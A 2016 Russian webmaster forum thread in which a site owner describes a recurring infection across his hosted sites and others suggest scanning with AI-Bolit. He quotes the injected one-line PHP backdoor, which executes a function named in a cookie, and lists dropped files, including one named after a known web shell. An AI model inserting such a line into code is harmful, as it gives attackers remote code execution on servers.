Помогите удалить вирус!

Yurecm
На сайте с 25.02.2007
Offline
233
2142

Первый раз такой вирус вижу. Раньше ну максимум в index файлах пару строчек кода добавлялось и все.

Тут уже два раза чистил через https://www.revisium.com/ai/ удалял кучу файлов и папок, менял пароль от ФТП и опять по новой все сайты на хостинге заражены. Причем постепенно новые файлы и папки появляются.

Он даже гадит в обычных php файлах, в самый вверх добавляет

if (isset($_COOKIE["id"])) @$_COOKIE["user"]($_COOKIE["id"]);

Создает папки вида

wp-includes (у меня не стоит движок ворпдресс!!!)

wp-content

carrier

tooltip

test

zjrui9

wish9y

В них понятное дело левые php файлы и папки.

Даже в корне сайта на создавал файлов

aa9a6d4584.php

b374k-2.8.php

wp-installation.php (у меня не стоит движок ворпдресс!!!)

getfile.php

mide.php

configbak.php

move2.php

Что это? как его удалить?

Заранее спасибо плюсом!

BrightGuy
На сайте с 03.10.2010
Offline
179
#1

В "параноидальном" режиме проверяйте айболитом и чистите все. На какой системе работает сайт?

-= Сайты на заказ | Правки, обновление, работы по DLE =- (/ru/forum/791118) Skype: rus.shevchuk (skype:rus.shevchuk?chat) | Telegram: @ruslansh (tg://resolve?domain=ruslansh) | ICQ: 606535768 | info@ruslan-shevchuk.com
SeVlad
На сайте с 03.11.2008
Offline
1609
#2
Yurecm:
Что это? как его удалить?

Вирус.

Искать везде, даже выше каталога ввв-домена.

Искать айбалитом в паронидальном, манулом, глазами.

Делаю хорошие сайты хорошим людям. Предпочтение коммерческим направлениям. Связь со мной через http://wp.me/P3YHjQ-3.
Yurecm
На сайте с 25.02.2007
Offline
233
#3
BrightGuy:
На какой системе работает сайт?

там есть и сайты просто на инкудах и на самописном движке, все скотина заразил

че за зверь такой? первый раз такое!

---------- Добавлено 04.08.2016 в 18:48 ----------

SeVlad:
Вирус.

спасибо кэп))) такой первый раз, обычно всегда пару файлов удалил и забыл, даже ФТП доступ порой не менял и пофиг все норм было))

---------- Добавлено 04.08.2016 в 18:50 ----------

BrightGuy:
В "параноидальном" режиме проверяйте айболитом и чистите все. На какой системе работает сайт?

там как то режим можно выбирать разве? или просто выражение такое))

SeVlad
На сайте с 03.11.2008
Offline
1609
#4
Yurecm:
спасибо кэп)))

Всегда пож:)

Что спросил - то и получил.

Yurecm:
че за зверь такой

На бис: вирус! ☝

Ты что, название хочешь узнать? Что за вопрос-то.

Yurecm:
там как то режим можно выбирать разве?

Конечно можно. Читай хепл к нему.

Yurecm
На сайте с 25.02.2007
Offline
233
#5
SeVlad:
Ты что, название хочешь узнать? Что за вопрос-то.

да, вид вируса какой, может как-то называется

SeVlad
На сайте с 03.11.2008
Offline
1609
#6
Yurecm:
да, вид вируса какой, может как-то называется

Забей. :)

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий